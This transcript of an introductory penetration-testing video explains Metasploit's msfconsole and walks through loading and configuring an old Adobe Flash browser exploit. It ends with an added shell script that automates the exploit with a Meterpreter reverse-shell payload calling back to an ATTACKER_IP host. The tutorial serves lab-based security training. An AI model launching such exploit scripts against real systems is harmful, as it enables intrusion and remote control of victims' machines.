[00:00:00] Welcome to part one of this module. In this section we're going to be studying the Metasploit framework, which comes pre-installed in Kali Linux, as well as Armitage, which is a graphical front end for Metasploit. Because of the complexity of these applications, this module will focus exclusively on them and will be divided up into several different videos, starting with a basic introduction and explanation of what Metasploit actually is. While I normally try to keep each individual application confined to a standalone video, that really isn't possible in the case of Metasploit. So it is recommended that you follow the videos presented in this module in order. If you have been following all of these videos in order, one after another, you may have just arrived from the section covering Wi-Fi hacking and radio-based attacks. If so, I'll mention that it is perfectly okay to use a VirtualBox installation of Kali for this module. In fact, most if not all of the demonstrations will be done in VirtualBox. However, please keep in mind that VirtualBox is significantly slower than a fully installed version of Kali, or just running it off a USB with persistence. There are a few things we can do to make Metasploit run a little faster, but if you choose to use VirtualBox, please keep in mind the need for patience.
[00:01:30] I also need to open by saying that once again we will be using the Metasploitable virtual system as the target for all of our attacks using Metasploit. For more detailed instructions on how to set up such a virtual system, please refer back to the first module, which covers setting up the lab. And because I'm required to say this, I must once again remind you to never use this or any other tool seen in any of these demonstrations in any sort of unlawful manner. Never use them against a system that you do not personally own or have written permission from the owner to penetration test. All right, so what is Metasploit? Metasploit is the leading exploitation framework. It is used by nearly every penetration tester and ethical hacker out there. It was developed by a group called Rapid7, a company that owns a lot of different vulnerability scanners, and it is well worth looking them up when you have a little free time. Metasploit is basically the premier toolkit that hackers use to hack systems, and no lawful penetration tester can afford not to study it. In a moment we're going to look over the Metasploit interfaces. You may recognize some that we have seen already over the course of this class, albeit in other forms.
[00:02:55] We will be starting out with msfconsole, which is the command line interface for Metasploit, and then we will work our way up to Armitage, which is a graphical user interface, or GUI, framework that allows you to use Metasploit more conveniently. The first thing to understand is that Metasploit needs to be set up correctly, or else it is going to be needlessly slow. Now, we could just launch it directly by going to Applications, Exploitation Tools and clicking on Metasploit, or from the Kali Linux sidebar. But let's do this right. So we're going to begin by opening up a terminal window, and we're going to start the PostgreSQL database service. What this will do is allow Metasploit to run faster searches, as well as allow Metasploit to store the information while you are performing scanning and exploitation. It is not, as I said, an absolute requirement, but it is a good practice for efficiency. So let's do that now:

service postgresql start

Keep in mind this will take a moment, and if you are in VirtualBox it may take several moments for the service to start. Now, with that done, we could just load directly into Metasploit, but I'm going to suggest running one more command.
[00:04:33] The very first time that you run Metasploit it is going to need to build a database, and it is going to take quite a long time. This won't be required every time that you run Metasploit. Sometimes the database cache does not get built correctly, and this can result in slow searches. If this is your first time running Metasploit, I suggest that you run the following command:

msfdb init

In my case the database is already started and configured, and if you get that message, great, move on and don't worry about it. Otherwise this will begin building the database, which may take quite some time, but it is a good investment of time to get this done now rather than having to perpetually deal with slow searches within the framework. Once that's done, we're going to type msfconsole to begin loading Metasploit. If you chose to start the PostgreSQL service, this will load faster, but it always takes some time for this to come up, particularly in VirtualBox. And again, please bear in mind that the first time that you're running Metasploit the load time is going to be very slow, as it's going to be building these databases. Once the console does finally finish loading, you'll be treated to one of a dozen or so random banners, possibly containing some ASCII art.
[00:06:09] These banners are quite amusing, but some of them confuse new users because they make it appear that Metasploit failed to load correctly. They can take the form of a joke error message that is actually a reference to old movies and video games about hacking, but if you don't know the reference you might be thinking that the framework crashed. Since the banner is random, and different versions have different banners, I don't really know for sure what you'll be presented with when you first load up Metasploit, but as long as you see this bit here at the bottom you can be confident that Metasploit is working correctly. Also notice that the prompt has changed to msf. I want to point out that if you watched the video on Recon-ng, a lot of things about this framework are going to look very familiar to you. This is no accident, as Recon-ng was designed to be very similar to Metasploit. All right, once again I'm going to suggest an optional command. If this is your first time using Metasploit, your database cache may not have been built properly. We have the msf prompt, which means we are in msfconsole, so I suggest running the following command:

db_rebuild_cache

This gives us a message about purging and rebuilding the module cache in the background while we work.
[00:07:43] As I said, this is not absolutely necessary, but using this command is how we fix any problems with the cache that can result in slow searches, and it should only be necessary to do this the very first time that you load Metasploit, not every time you load Metasploit. But if you run into any problems, by all means run the command again. In any case, now that we're up and running, we'll begin by looking at the Metasploit keywords. Metasploit has six types of modules, although we will mostly be using just four of them. Briefly put, it has exploits, auxiliary, post, payloads, encoders and nops. An exploit is a module that will take advantage of a system vulnerability. This is why reconnaissance of our targets is so important. Just because we know an exploit exists for a particular operating system or application, it won't do us any good if that vulnerability has already been patched. We've seen how to find these vulnerabilities in prior modules, and this is the class of tools that allows you to attack them. Usually these exploits seek to install a payload on the target system. These payloads typically take the form of a reverse shell or a Meterpreter, giving you direct access to that computer.
[00:09:16] In other contexts payloads are often referred to as rootkits or, somewhat more broadly, as remote access tools. Auxiliary modules are sort of a catch-all class for things like port scanners, fuzzers, sniffers and the like. Encoders ensure that payloads make it to their destination intact. This is a little hard to explain in a coherent way at this stage of the tutorial, because it can seem overly technical and overwhelming, but this should become more clear as we go along. And nops just keep payload sizes consistent across exploit attempts. This should also become more clear as we go along. So the very best command to remember in Metasploit is, unsurprisingly, the help command. If we open this up we can see a long list of examples and commands that can seem quite overwhelming, but don't try to figure it all out right now. Just remember that this exists as a reference for you to go back to at any point as we go along. If you get confused, if you find yourself getting lost or trying to do something outside of the bounds and scope of this tutorial, and the help file itself is not enough to answer your question, use it as a starting point for your web searches and there is a good chance you'll find what you're looking for. All right, so now let's look at the use command.

[00:10:56] Again, if you watched the Recon-ng video, this is going to seem very familiar to you. If not, briefly, what use does is allow you to load up a particular module within the framework. For this example, let's say that we have a target system and we have detected that it is vulnerable to an old Adobe Flash plugin exploit. So we're going to use the use command. Then, from here, the path follows a certain logic: we specify that we want to use an exploit, forward slash, then we add in windows because it is a Windows exploit, then we add in a forward slash, browser, and another forward slash, and include the name of the browser exploit, which in this case is going to be adobe_flash_avm2. It's all going to look like this:

use exploit/windows/browser/adobe_flash_avm2

Hit enter, and right away we notice that the prompt has changed. This tells us that the exploit we want to work with is now loaded up, and any commands we run from here will apply to the exploit itself. The module name being displayed in red means that it is ready for use.
[00:12:37] The first thing we want to do is type the show command, and this will give us information about the module itself. Since we didn't provide any sort of argument to this command, it is going to show us everything there is to see, and this will seem very overwhelming, but don't worry about it, and do please be patient, as this will be somewhat slow to pop up for larger exploits like this. We need to know about the show command for circumstances where we need to check something specific about the module itself, but for the most part we don't really need to know all of this. Needless to say, that was a lot to take in. A better and more digestible thing to do is to use the show options command. This will give us options for the module that we're working with that we can customize depending on the method of exploitation. In this case we have the server host, the server port, the SSL certificate, etc. Every exploit will have certain options that you can change. This will become more clear later. Next we'll have a look at the show payloads command, and this will probably take a few seconds, particularly in VirtualBox. These are all the payloads that we can load. Each one gives us a different way of approaching an attack. This will show you all the payloads that are compatible with this particular exploit.
[00:14:13] Another one is the show targets command. In this case none are set. With different exploits you can have multiple targets, and it's important to get this right. This will be elaborated on a bit later. Next we look at the show info command, and this gives us general information about what the module itself is supposed to do. So in this case, if we read what is written here: this module exploits a vulnerability found in the ActiveX component of Adobe Flash Player before a certain version number. By supplying a specially crafted SWF file it is possible to trigger an integer underflow in several AVM2 instructions, which can be turned into remote code execution under the context of the user, and so on and so on. In other words, if your target is running a version of Adobe Flash Player older than version 12.0.0.43, this module will attempt to exploit this integer underflow bug to run a payload on the target system in the background, and make it appear to the system that the user of the system is the one running it. In other words, it can install, for example, a remote access package and make it seem to the system as if the user was the one who did it, thus bypassing many or all security defensive measures. Of course, this is a very old exploit and will not work on Flash Player versions past 12.0.0.43.
[00:16:00] But this is just an example chosen to give you an idea of how this process works. You detect what your target is vulnerable against during a reconnaissance phase, and then you find the appropriate exploit within the Metasploit framework to go after it. And this leads us nicely to the msf search command, because once you've found something on a target machine that you want to exploit, you need to find the appropriate exploit for it within Metasploit. Metasploit has a lot of modules, so finding the right one can be quite time consuming. The syntax is going to contain keywords such as we have already seen: the first will be platform, then the type of module, such as for example an exploit or a payload, and then finally the specific name that we're looking for. First we're going to exit out of the current module and return to the msf console. For this we'll use the back command. Notice that unloaded the module and our prompt just says msf again. Now, from here, what this is going to look like is search type:exploit, then a space, platform:windows, another space, and flash:

search type:exploit platform:windows flash

This will eventually give us a list of all exploits that fit the bill. Incidentally, if you received any sort of a warning about searches being slow due to the database cache, this is why it is important to run that db_rebuild_cache command the very first time we load up Metasploit. That should fix any sort of problem with slow searches that you might get. So now, if we scroll up, we can see that the exploit we just used is listed near the top. Notice that they are sorted by name, with the date of disclosure, the rank and a general description. So we'll just copy the one we want, which in this example is the one we were just using, and from here we'll use the use command. We'll go ahead and paste that in, and we'll do show options. And now we want to set some of these options. That is very easy: we will just use the set command to do it. For example, if you wanted to set the server port, it would be set SRVPORT and then the port. Forgive my typing:

set SRVPORT 80

Another example might be that we want to set the server host, so we'll use set SRVHOST 10.0.10.11, which in this case is the local IP address of my Metasploitable machine on my network:

set SRVHOST 10.0.10.11

Now, to launch the exploit, we simply type exploit. I've gone ahead and used Ctrl-C to interrupt this, because I'm getting into using these exploits for another video and I don't think I properly configured the port, but the point is this is how you would do it: you simply set the options, you give it the target, and then you type the exploit command.
[00:19:49] OK, so once again we use the back command to get to the msf console, and, last but not least, the exit command to shut down Metasploit and get back to the regular command prompt. All right, that'll about do it for this introductory video. I hope this wasn't too overwhelming or confusing. This is a very complex subject, but hopefully, as we go along and there are more practical examples of using some of these exploits and other tools, the concepts and commands will begin to make a little bit more sense. We have to learn to walk before we can run. Thank you for your patience and your attention.
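The whole msfconsole sequence walked through in this video, collected into one shell script that drives Metasploit non-interactively through a resource file (msfconsole -r runs the listed commands in order, exactly as if typed at the msf prompt). This is an added example, not code from the video or from the Metasploit project. It assumes a Kali-style install where "service postgresql start" and "msfdb init" exist, and the address 10.0.10.5 is a placeholder (override with ATTACKER_IP) for the interface on which the Kali box should listen, which is what the SRVHOST and LHOST options bind to. Two points a practitioner will want: "exploit -j" runs the browser-exploit web server as a background job so the console stays usable (inspect with jobs and sessions -l), and db_rebuild_cache is deliberately left out because Metasploit 5 and later no longer have that command (module metadata is cached automatically); db_status is kept as a quick check that the database connected.

```shell
#!/bin/sh
# Added example, not from the video or the Metasploit project.
# Drives the msfconsole steps from the tutorial with a resource (.rc) file.
# Assumptions: Kali-style service/msfdb commands; ATTACKER_IP is a placeholder
# for the Kali listening interface (SRVHOST/LHOST bind to it).

ATTACKER_IP="${ATTACKER_IP:-10.0.10.5}"   # assumed placeholder, change it
SRVPORT="${SRVPORT:-8080}"                # assumed port for the exploit's web server

# Emit the console commands, one per line, in the order the video types them.
msf_lab_rc() {
    cat <<EOF
db_status
search type:exploit platform:windows flash
use exploit/windows/browser/adobe_flash_avm2
show options
set SRVHOST ${ATTACKER_IP}
set SRVPORT ${SRVPORT}
set URIPATH /
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST ${ATTACKER_IP}
exploit -j
EOF
}

# Count of commands the resource file will contain (used as a sanity check).
msf_lab_rc_lines() {
    msf_lab_rc | wc -l | tr -d ' '
}

# One-time setup: start PostgreSQL so searches and loot use the database,
# then initialise the Metasploit database (safe to re-run; it reports if done).
msf_lab_prep() {
    service postgresql start
    msfdb init
}

# Write the resource file to a temp path and hand it to msfconsole.
# -q suppresses the random banner that confuses new users; -r runs the file.
msf_lab_run() {
    rc="$(mktemp)"
    msf_lab_rc > "$rc"
    msfconsole -q -r "$rc"
    rm -f "$rc"
}

# Usage: sh msf_lab.sh prep | run | rc   (no argument does nothing)
case "${1:-}" in
    prep) msf_lab_prep ;;
    run)  msf_lab_run ;;
    rc)   msf_lab_rc ;;
esac
```

Run "sh msf_lab.sh rc" first to review the generated commands, "prep" once on a fresh Kali box, then "run". The browser exploit from the video only fires when a vulnerable Internet Explorer/Flash client visits http://ATTACKER_IP:SRVPORT/, so the URIPATH is pinned to / to make that URL predictable.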